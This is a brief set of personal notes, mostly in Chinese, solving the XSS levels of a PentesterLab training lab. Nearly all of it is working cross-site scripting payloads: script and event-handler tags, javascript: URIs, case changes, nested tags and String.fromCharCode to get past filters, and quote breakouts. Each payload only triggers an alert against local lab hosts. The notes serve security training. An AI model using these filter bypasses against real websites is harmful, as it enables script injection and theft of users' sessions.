pentestlabs

xss

第一题
<script>alert('xss')</script>
<iframe src=javascript:alert('xss')></iframe>
<a href=javascript:alert('xss')>ggtest</a>
<img src=1 onerror=alert('xss')>

http://10.211.55.16/xss/example1.php?name=<button type="button" onclick=alert('xss')>通过按钮点击触发xss</button> <font size="4" color="blue" onmouseover=alert('xss')>  移动到元素触发xss  </font> <br>
<select> <option onclick=alert('x')>onclick点击触发事件</option> <option values=1 onmousedown=alert('ss')>onmousedown触发</option></select> <a href=javascript:alert('xss')>利用a标签的href属性触发</a> <br>
<textarea placeholder=国光的xss测试：键盘按键触发xss onkeypress=alert('xss')></textarea>

第二题
<Script>alert(1);</Script>#大小写转换
其他是第一题的

第三题  双写
<img src=1 onerror=alert('xss')>
<sc<script>ript>alert('xss')</sc</script>ript>

第四题 标签绕过
 <img src=1 onerror=alert('xss')>

第五关 过滤alert //String.fromCharCode
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>

第六关 闭合
111";</script><script>alert(1)</script>//

第七题 闭合过滤<>使用alert
alert';onclick=alert('xss')//

第八关
http://192.168.233.147/xss/example8.php/"><img src=1 onerror=alert('xss')><from